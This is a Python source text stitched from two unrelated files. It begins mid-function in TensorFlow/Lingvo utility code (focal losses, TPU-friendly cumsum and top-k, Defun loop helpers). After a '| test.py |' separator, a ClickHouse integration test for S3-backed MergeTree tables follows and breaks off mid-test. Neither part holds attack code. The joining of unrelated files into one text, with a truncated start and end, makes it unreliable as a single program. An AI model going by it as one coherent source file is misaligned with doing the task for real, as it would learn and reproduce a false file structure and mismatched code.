"""Checks whether the Defun depends on stateful random number ops.
Stateful random number generator ops should be avoid in Recurrent() call.
Otherwise, these ops produce inconsistent values between FProp and BProp.
Args:
func: a _DefinedFunction to check.
graph: a Graph. Set None to use the default graph.
Returns:
A list of names of the stateful random ops.
Raises:
InvalidArgumentError: if the input func/graph is invalid.
"""
if not isinstance(func, function._DefinedFunction): # pylint: disable=protected-access
raise tf.errors.InvalidArgumentError(None, None,
'func is not a _DefinedFunction.')
if graph is None:
graph = tf.get_default_graph()
func.add_to_graph(graph)
graph_def = graph.as_graph_def()
# A dict from function name to FunctionDef.
func_defs = {x.signature.name: x for x in graph_def.library.function}
if func.definition.signature.name not in func_defs:
raise tf.errors.InvalidArgumentError(
None, None,
'Defun {} is not in the graph .'.format(func.definition.signature.name))
stateful_ops = []
# Recursively search for stateful random op.
nodes = py_collections.deque(func.definition.node_def)
while nodes:
node = nodes.pop()
assert isinstance(node, node_def_pb2.NodeDef), node
if node.op in _STATEFUL_RANDOM_OPS:
stateful_ops.append(node.op)
continue
def _AddDefunNodes(func_name):
"""If the given func_name is a Defun, add its sub-nodes into nodes."""
if func_name in func_defs:
nodes.extend(func_defs[func_name].node_def)
# For functional.{While|For|If} ops, add their Defun attr into search.
if node.op == 'While':
_AddDefunNodes(node.attr['body'].func.name)
_AddDefunNodes(node.attr['cond'].func.name)
elif node.op == 'For':
_AddDefunNodes(node.attr['body'].func.name)
elif node.op == 'If':
_AddDefunNodes(node.attr['then_branch'].func.name)
_AddDefunNodes(node.attr['else_branch'].func.name)
else:
# For other op, check whether itself is a Defun op.
_AddDefunNodes(node.op)
return stateful_ops
def ToPlaceholders(nmap, dtype=None):
"""Converts every Tensor in nmap to a placeholder."""
def _ToPlacerholder(x):
shape = [None for _ in x.shape[:-1]] + [x.shape[-1]]
return tf.placeholder(dtype=dtype or x.dtype, shape=shape)
return nmap.Transform(_ToPlacerholder)
def SoftmaxCrossEntropyFocalLoss(logits,
label_ids=None,
label_probs=None,
alpha=None,
gamma=None):
u"""Focal loss for multinomial (softmax) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the multinomial logistic regression. C is the
number of classes.
label_ids: [...]. Each entry in labels must be an index in [0, C).
label_probs: [..., C]. Each vector along last dimension must be a valid
probability distribution.
alpha: [C]. The weighting factor alpha. Eq (3) in [1].
gamma: []. Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
if label_probs is not None:
log_probs = tf.nn.log_softmax(logits)
loss = -(label_probs * log_probs)
if gamma is not None and gamma != 0:
probs = tf.exp(log_probs)
loss *= tf.pow(1.0 - probs, gamma)
if alpha is not None:
loss *= tf.reshape(
alpha, tf.concat([tf.ones(tf.rank(loss) - 1, tf.int32), [-1]],
axis=0))
loss = tf.reduce_sum(loss, axis=-1)
else:
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=label_ids, logits=logits)
if gamma is not None and gamma != 0:
probs = tf.exp(-loss)
loss *= tf.pow(1.0 - probs, gamma)
if alpha is not None:
loss *= tf.gather(alpha, label_ids)
return loss
def SigmoidCrossEntropyFocalLoss(logits, labels, alpha=None, gamma=None):
u"""Focal loss for binary (sigmoid) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the sigmoid logistic regression.
labels: [..., C]. 0/1 labels.
alpha: The weighting factor alpha. Eq (3) in [1].
gamma: Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
# [1] Eq (4).
#
# The numerically-stable way to compute
# log(p) for positives;
# log(1 - p) for negatives.
loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
if gamma is not None and gamma != 0:
# The modulating factor. Note that
# (1 - p)ˠ = [1 - σ(x)]ˠ = [σ(-x)]ˠ, for positives.
# pˠ = [σ(x)]ˠ, for negatives.
loss *= tf.pow(tf.sigmoid(logits * (1 - labels * 2)), gamma)
if alpha is not None:
# [1] Eq (3)
loss *= (alpha * labels + (1 - alpha) * (1 - labels))
return loss
_RECORD_FORMAT_RE = re.compile('(^[A-Za-z]+):(.*)')
def RecordFormatFromFilePattern(file_pattern):
"""Return the record format string for a Lingvo file pattern.
Lingvo file patterns take the form of:
tfrecord:/path/to/bar -> tfrecord is the record_format.
This function takes a file pattern and returns a string indicating
which format the filepattern implies.
Args:
file_pattern: String file pattern.
Returns:
Tuple (string, string):
- record_format: String record format, e.g., "tfrecord", etc.
- file_pattern: The file pattern without any prefixes.
"""
result = re.match(_RECORD_FORMAT_RE, file_pattern)
if result is None:
# TODO(vrv): Fix all callers so that file_pattern must contain
# the record format prefix.
return 'sstable', file_pattern
# regexp ensures that a match implies there are two groups:
# the record format and then the file pattern.
return result.groups()
def ReadFileLines(file_path):
"""Read a text file and return the lines.
If the file cannot be found at the given path, attempt to load it from the
Lingvo package (useful for data dependencies in par files).
Args:
file_path: path to file, either absolute or relative to the REDACTED workspace.
Returns:
A list of lines from the file.
"""
if not tf.io.gfile.exists(file_path):
try:
lines = pkgutil.get_data(
'lingvo', file_path.replace('third_party/py/lingvo/', '',
1)).splitlines(True)
except IOError:
# If pkgutil can't find the file, continue and let GFile raise the error.
lines = None
else:
lines = None
if not lines:
with tf.io.gfile.GFile(file_path, 'r') as f:
lines = f.readlines()
return lines
# Partially borrowed from
# https://github.com/tensorflow/tensor2tensor/blob/32929305e1a4ec926eff24123758b794df35492b/tensor2tensor/layers/common_layers.py#L349
def CumSum(x, axis=0, exclusive=False):
"""A TPU efficient implementation of tf.cumsum().
This is equivalent to tf.cumsum and is faster on TPU as of 08/2019 unless
the axis dimension is very large. The current Tensorflow implementation is
based on scanning and reducing which is not efficient on TPU.
Args:
x: An input Tensor.
axis: An int for the axis.
exclusive: A bool for performing exclusive cumsum.
Returns:
A Tensor of the same shape as x.
Raises:
ValueError: if the input axis is invalid.
"""
if x.dtype not in (tf.float32, tf.bfloat16) or not use_tpu():
# Fallback to tf.cumsum when inputs are not floats or not running on TPU.
return tf.cumsum(x, axis=axis, exclusive=exclusive)
rank = GetRank(x)
# Needs to know the rank for the final transpose if axis is not the last
# dimension. Otherwise, falls back to tf.cumsum.
if not isinstance(rank, int) and axis != -1:
return tf.cumsum(x, axis=axis, exclusive=exclusive)
if axis < -1:
if axis + rank < 0:
raise ValueError('Unexpected axis: %d (rank = %d)' % (axis, rank))
axis += rank
length = GetShape(x)[axis]
my_range = tf.range(length)
comparator = tf.less if exclusive else tf.less_equal
mask = tf.cast(
comparator(tf.expand_dims(my_range, 1), tf.expand_dims(my_range, 0)),
x.dtype)
result = tf.tensordot(x, mask, axes=[[axis], [0]])
if axis != -1 and axis != rank - 1:
result = tf.transpose(
result,
list(range(axis)) + [rank - 1] + list(range(axis, rank - 1)))
return result
def ProjectLastDim(inputs, weight, input_dim, output_dim):
"""Linear projection on the last dim of the input tensor.
This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
tensor by using Einsum for the compute.
Args:
inputs: An input Tensor, the last dimension of which is input_dim.
weight: A weight matrix with shape [input_dim, output_dim].
input_dim: An integer or a symbolic dim, the last dimension of the inputs.
output_dim: An integer or a symbolic dim, the last dimension of the outputs.
Returns:
An output Tensor of the same rank as inputs, the last dimension is
output_dim.
"""
input_dim = int(
symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
output_dim = int(
symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
) else output_dim)
# Assert input_dim and output_dim
inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
inputs)
weight = with_dependencies([
assert_equal(GetShape(weight)[0], input_dim),
assert_equal(GetShape(weight)[-1], output_dim)
], weight)
if (use_tpu() and inputs.shape is not None and
inputs.shape.rank is not None and inputs.shape.rank < 26):
# Avoids reshape if feasible and uses Einsum.
if inputs.shape.rank == 2:
outputs = tf.matmul(inputs, weight)
else:
s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
r = inputs.shape.rank
outputs = tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), inputs, weight)
else:
outputs = Matmul(tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight)
outputs = tf.reshape(
outputs,
tf.concat([
tf.cast(GetShape(inputs)[:-1], tf.int32),
ToStaticShape([output_dim])
],
axis=0))
return outputs
@contextlib.contextmanager
def RemoveAssertContext(remove=True):
"""Hacks to replace certain unwanted tensorflow ops."""
# TODO(zhifengc/huangyp): Consider implementing assert_equal
# op replacement for lingvo. As assert_equal doesn't support String on GPUs.
# Hack to replace tf.assert_equal
# TODO(b/136040013): Remove this after migration to tf.function.
if remove:
saved_assert_equal = tf.check_ops.assert_equal
# pylint: disable=unused-argument
def NoOP(*args, **kwargs):
return tf.no_op()
# pylint: enable=unused-argument
tf.check_ops.assert_equal = NoOP # Make assert_equal a no op.
yield
tf.check_ops.assert_equal = saved_assert_equal
else:
yield
def _DefineDefun(fwd, bak, args):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
bak: A callable xs, ys, dys: Nested Structure -> dxs: Nested Structure. The
custom backprop function for fwd.
args: A Nested Structure of tf.Tensor.
Returns:
A NestedMap w/ fields:
defun: A tf.Defun wraps fwd
args: A Nested Structure of tf.DType
rets: A Nested Structure of tf.DType
"""
assert fwd is not None
# fwd signature (tf.Tensor dtypes).
get_dtype = lambda x: x.dtype
sigs = NestedMap(args=Transform(get_dtype, args))
get_shape = lambda x: x.shape
arg_shapes = Transform(get_shape, args)
compiled = use_xla()
noinline = not compiled
def Backward(op, *args):
assert bak is not None
xs = Pack(sigs.args, op.inputs)
# Note: sigs.rets will be set during the Forward call.
ys = Pack(sigs.rets, op.outputs)
dys = Pack(sigs.rets, args)
with RemoveAssertContext(remove=noinline):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
@tf.Defun(*Flatten(sigs.args), python_grad_func=Backward, noinline=noinline)
def Forward(*args):
for arg, shape in zip(args, Flatten(arg_shapes)):
arg.set_shape(shape)
with RemoveAssertContext(remove=noinline):
rets = fwd(Pack(sigs.args, args))
sigs.rets = Transform(get_dtype, rets)
return Flatten(rets)
sigs.defun = Forward
return sigs
def CallDefun(fwd, bak, args):
"""Wraps fwd in a defun with custom gradient bak and calls it with args.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
bak: A callable xs, ys, dys: Nested Structure -> dxs: Nested Structure. The
custom backprop function for fwd.
args: A Nested Structure of tf.Tensor.
Returns:
A Nested Structure equivalent to what fwd(args) computes.
"""
sigs = _DefineDefun(fwd, bak, args)
flat_rets = sigs.defun(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
return Pack(sigs.rets, flat_rets)
def _Itype():
"""Loop iterator data type."""
return tf.int32 if use_xla() else tf.int64
def WhileLoop(cond, body, loop_state):
"""Helper to construct a while loop.
Args:
cond: A callable NestedMap -> tf.bool.
body: A callable NestedMap -> NestedMap.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(loop_state=loop_state)
dtypes = state.Transform(lambda x: x.dtype).Flatten()
@tf.Defun(*dtypes)
def LoopCond(*args):
s = state.Pack(args)
return cond(s.loop_state)
@tf.Defun(*dtypes)
def LoopBody(*args):
s = state.Pack(args)
s.loop_state = body(s.loop_state)
return s.Flatten()
return state.Pack(
tf.While(input_=state.Flatten(), cond=LoopCond, body=LoopBody)).loop_state
def ForLoop(body, start, limit, delta, loop_state):
"""Helper to construct a for loop.
Args:
body: A callable (tf.int, NestedMap) -> NestedMap.
start: Loop variable's initial value.
limit: Loop variable's limit value.
delta: Loop variable's change per iteration.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(
iter=tf.cast(start, _Itype()),
limit=tf.cast(limit, _Itype()),
delta=tf.cast(delta, _Itype()),
loop_state=loop_state)
def LoopCond(state):
return tf.less(state.iter, state.limit)
def LoopBody(state):
state.loop_state = body(state.iter, state.loop_state)
state.iter = tf.add(state.iter, state.delta)
return state
return WhileLoop(LoopCond, LoopBody, state).loop_state
def TopK(x_in, k):
"""Equivalent to tf.math.top_k(x_in, k) but more efficient on tpu."""
assert k <= 2, 'This implementation is only efficient for small k.'
# TODO(yonghui): Try out an alternative idea where we first reshape x_in as a
# 2d tensor, then call tf.math.top_k, and then reshape back.
x_in_shape = x_in.shape
x_rank = x_in_shape.rank
assert x_rank and x_in_shape.as_list()[x_rank - 1] > 0
last_dim_size = x_in_shape.as_list()[x_rank - 1]
min_value = tf.math.reduce_min(x_in) - 1.0
out_indices = []
out_values = []
for unused_i in range(k):
index_i = tf.math.argmax(x_in, axis=-1, output_type=tf.int32)
mask_i = tf.one_hot(index_i, last_dim_size)
# TODO(yonghui): Would tf.gather be more efficient and numerically stable
# here?
value_i = tf.reduce_sum(mask_i * x_in, -1, keepdims=True)
x_in = (1.0 - mask_i) * x_in + mask_i * min_value
out_indices.append(tf.expand_dims(index_i, -1))
out_values.append(value_i)
if k == 1:
return out_values[0], out_indices[0]
else:
return tf.concat(out_values, x_rank - 1), tf.concat(out_indices, x_rank - 1)
def ReadVariable(var_op):
"""Returns the value of the given variable operation.
Args:
var_op: The variable's TF `Operation`. It could be one of VarHandleOp,
Variable and VariableV2.
Returns:
A `Tensor` containing the value of the variable.
"""
if var_op.type == 'VarHandleOp':
# Filter out the ReadVariableOps that have control dependencies to avoid
# side-effects when the user runs it.
filter_fn = lambda op: op.type == 'ReadVariableOp' and not op.control_inputs
var_readers = list(filter(filter_fn, var_op.outputs[0].consumers()))
assert var_readers
return var_readers[0].outputs[0]
assert var_op.type in ['Variable', 'VariableV2']
return var_op.outputs[0]
_TPU_SUMMARY_TENSORS_KEY = ('__lingvo_tpu_summary_tensors')
_get_tpu_summary_tensors = _CollectionGetter(_TPU_SUMMARY_TENSORS_KEY,
lambda: [])
def AddTpuSummaryTensor(name, value, weight=1.0):
"""Adds tensor to global collection of summaries.
This needs to be used in situations where tf.summary() could be used but
currently tf.summary is not supported. Use py_utils.AddTpuSummaryTensor() in
low level code to add summary tensors to global collection of summaries.
Then recover all summary tensors from global collection by calling
py_utils.GetTpuSummaryTensors() from top level code (for example from
ComputeLoss method of BaseTask).
In addition to 'name' argument, current tensorflow name scope is also
captured and added to the metric name. This way for example summaries from
a repeated layer will appear as separate graphs in the tensorboard.
Weight argument is optional and defaults to 1.0. See BaseTask.ComputeLoss for
the exact definition of weight for eval metrics.
Args:
name: metric name
value: metric value tensor
weight: weight tensor for weighted metrics
"""
tpu_summary_tensors = _get_tpu_summary_tensors()
x = NestedMap()
x.name = name
x.value = value, tf.convert_to_tensor(weight)
x.name_scope = tf.get_default_graph().get_name_scope()
tpu_summary_tensors.append(x)
def GetTpuSummaryTensors():
"""Returns summary tensors from global collection.
Returns:
A dict containing str keys and (metric, weight) pairs as values
"""
tpu_summary_tensors = _get_tpu_summary_tensors()
return {
'%s/%s' % (x.name, SanitizeScopeKey(x.name_scope)): x.value
for x in tpu_summary_tensors
}
def ComputationShape(split_size):
"""Decides the computation shape based on the split_size."""
computation_shape = None
if split_size == 1:
computation_shape = [1, 1, 1, 1]
elif split_size == 2:
computation_shape = [1, 1, 1, 2]
elif split_size == 4:
computation_shape = [2, 1, 1, 2]
elif split_size == 8:
computation_shape = [2, 2, 1, 2]
elif split_size == 16:
computation_shape = [4, 2, 1, 2]
elif split_size == 32:
computation_shape = [4, 4, 1, 2]
elif split_size == 64:
computation_shape = [4, 8, 1, 2]
elif split_size == 128:
computation_shape = [8, 8, 1, 2]
elif split_size == 256:
computation_shape = [8, 16, 1, 2]
elif split_size == 512:
computation_shape = [16, 16, 1, 2]
elif split_size == 2048:
computation_shape = [32, 32, 1, 2]
else:
assert False, ('Model parallelism with %d devices is currently not'
' supported.' % split_size)
assert computation_shape is not None
return computation_shape
def GetExtraVars():
"""Returns the captured variables by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.variable_captures
return function.get_extra_vars()
def GetExtraInputs():
"""Returns the captured input tensors by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.external_captures
return function.get_extra_inputs()
def GetExtraArgs():
"""Returns the corresponding function arguments for the captured inputs."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.internal_captures
return function.get_extra_args()
|
test.py
|
import logging
import random
import string
import time
import threading
import os
import pytest
from helpers.cluster import ClickHouseCluster, get_instances_dir
# By default the exceptions that was throwed in threads will be ignored
# (they will not mark the test as failed, only printed to stderr).
#
# Wrap thrading.Thread and re-throw exception on join()
class SafeThread(threading.Thread):
def __init__(self, target):
super().__init__()
self.target = target
self.exception = None
def run(self):
try:
self.target()
except Exception as e: # pylint: disable=broad-except
self.exception = e
def join(self, timeout=None):
super().join(timeout)
if self.exception:
raise self.exception
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './{}/node/configs/config.d/storage_conf.xml'.format(get_instances_dir()))
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("node",
main_configs=["configs/config.d/storage_conf.xml",
"configs/config.d/bg_processing_pool_conf.xml"],
with_minio=True)
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
yield cluster
finally:
cluster.shutdown()
FILES_OVERHEAD = 1
FILES_OVERHEAD_PER_COLUMN = 2 # Data and mark files
FILES_OVERHEAD_PER_PART_WIDE = FILES_OVERHEAD_PER_COLUMN * 3 + 2 + 6 + 1
FILES_OVERHEAD_PER_PART_COMPACT = 10 + 1
def random_string(length):
letters = string.ascii_letters
return ''.join(random.choice(letters) for i in range(length))
def generate_values(date_str, count, sign=1):
data = [[date_str, sign * (i + 1), random_string(10)] for i in range(count)]
data.sort(key=lambda tup: tup[1])
return ",".join(["('{}',{},'{}')".format(x, y, z) for x, y, z in data])
def create_table(cluster, table_name, additional_settings=None):
node = cluster.instances["node"]
create_table_statement = """
CREATE TABLE {} (
dt Date,
id Int64,
data String,
INDEX min_max (id) TYPE minmax GRANULARITY 3
) ENGINE=MergeTree()
PARTITION BY dt
ORDER BY (dt, id)
SETTINGS
storage_policy='s3',
old_parts_lifetime=0,
index_granularity=512
""".format(table_name)
if additional_settings:
create_table_statement += ","
create_table_statement += additional_settings
node.query(create_table_statement)
def wait_for_delete_s3_objects(cluster, expected, timeout=30):
minio = cluster.minio_client
while timeout > 0:
if len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == expected:
return
timeout -= 1
time.sleep(1)
assert(len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == expected)
@pytest.fixture(autouse=True)
def drop_table(cluster):
yield
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("DROP TABLE IF EXISTS s3_test NO DELAY")
try:
wait_for_delete_s3_objects(cluster, 0)
finally:
# Remove extra objects to prevent tests cascade failing
for obj in list(minio.list_objects(cluster.minio_bucket, 'data/')):
minio.remove_object(cluster.minio_bucket, obj.object_name)
@pytest.mark.parametrize(
"min_rows_for_wide_part,files_per_part",
[
(0, FILES_OVERHEAD_PER_PART_WIDE),
(8192, FILES_OVERHEAD_PER_PART_COMPACT)
]
)
def test_simple_insert_select(cluster, min_rows_for_wide_part, files_per_part):
create_table(cluster, "s3_test", additional_settings="min_rows_for_wide_part={}".format(min_rows_for_wide_part))
node = cluster.instances["node"]
minio = cluster.minio_client
values1 = generate_values('2020-01-03', 4096)
node.query("INSERT INTO s3_test VALUES {}".format(values1))
assert node.query("SELECT * FROM s3_test order by dt, id FORMAT Values") == values1
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + files_per_part
values2 = generate_values('2020-01-04', 4096)
node.query("INSERT INTO s3_test VALUES {}".format(values2))
assert node.query("SELECT * FROM s3_test ORDER BY dt, id FORMAT Values") == values1 + "," + values2
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + files_per_part * 2
assert node.query("SELECT count(*) FROM s3_test where id = 1 FORMAT Values") == "(2)"
@pytest.mark.parametrize(
"merge_vertical", [False, True]
)
def test_insert_same_partition_and_merge(cluster, merge_vertical):
settings = None
if merge_vertical:
settings = """
vertical_merge_algorithm_min_rows_to_activate=0,
vertical_merge_algorithm_min_columns_to_activate=0
"""
create_table(cluster, "s3_test", additional_settings=settings)
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("SYSTEM STOP MERGES s3_test")
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 1024)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 2048)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 1024, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 2048, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(distinct(id)) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD_PER_PART_WIDE * 6 + FILES_OVERHEAD
node.query("SYSTEM START MERGES s3_test")
# Wait for merges and old parts deletion
for attempt in range(0, 10):
parts_count = node.query("SELECT COUNT(*) FROM system.parts WHERE table = 's3_test' FORMAT Values")
if parts_count == "(1)":
break
if attempt == 9:
assert parts_count == "(1)"
time.sleep(1)
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(distinct(id)) FROM s3_test FORMAT Values") == "(8192)"
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD)
def test_alter_table_columns(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
node.query("ALTER TABLE s3_test ADD COLUMN col1 UInt64 DEFAULT 1")
# To ensure parts have merged
node.query("OPTIMIZE TABLE s3_test")
assert node.query("SELECT sum(col1) FROM s3_test FORMAT Values") == "(8192)"
assert node.query("SELECT sum(col1) FROM s3_test WHERE id > 0 FORMAT Values") == "(4096)"
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD_PER_COLUMN)
node.query("ALTER TABLE s3_test MODIFY COLUMN col1 String", settings={"mutations_sync": 2})
assert node.query("SELECT distinct(col1) FROM s3_test FORMAT Values") == "('1')"
# and file with mutation
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + FILES_OVERHEAD_PER_COLUMN + 1)
node.query("ALTER TABLE s3_test DROP COLUMN col1", settings={"mutations_sync": 2})
# and 2 files with mutations
wait_for_delete_s3_objects(cluster, FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE + 2)
def test_attach_detach_partition(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test DETACH PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(4096)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test ATTACH PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test DROP PARTITION '2020-01-03'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(4096)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE
node.query("ALTER TABLE s3_test DETACH PARTITION '2020-01-04'")
node.query("ALTER TABLE s3_test DROP DETACHED PARTITION '2020-01-04'", settings={"allow_drop_detached": 1})
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(0)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_move_partition_to_another_disk(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-04' TO DISK 'hdd'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-04' TO DISK 's3'")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
def test_table_manipulations(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("RENAME TABLE s3_test TO s3_renamed")
assert node.query("SELECT count(*) FROM s3_renamed FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("RENAME TABLE s3_renamed TO s3_test")
assert node.query("CHECK TABLE s3_test FORMAT Values") == "(1)"
node.query("DETACH TABLE s3_test")
node.query("ATTACH TABLE s3_test")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 2
node.query("TRUNCATE TABLE s3_test")
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(0)"
assert len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_move_replace_partition_to_another_table(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
minio = cluster.minio_client
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 4096, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-06', 4096, -1)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert len(
list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD + FILES_OVERHEAD_PER_PART_WIDE * 4
create_table(cluster, "s3_clone")
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-03' TO TABLE s3_clone")
node.query("ALTER TABLE s3_test MOVE PARTITION '2020-01-05' TO TABLE s3_clone")
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(8192)"
assert node.query("SELECT sum(id) FROM s3_clone FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_clone FORMAT Values") == "(8192)"
# Number of objects in S3 should be unchanged.
assert len(list(
minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 4
# Add new partitions to source table, but with different values and replace them from copied table.
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096, -1)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 4096)))
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
assert node.query("SELECT count(*) FROM s3_test FORMAT Values") == "(16384)"
assert len(list(
minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD * 2 + FILES_OVERHEAD_PER_PART_WIDE * 6
node.query("ALTER TABLE s3_test REPLACE PARTITION '2020-01-03' FROM s3_clone")
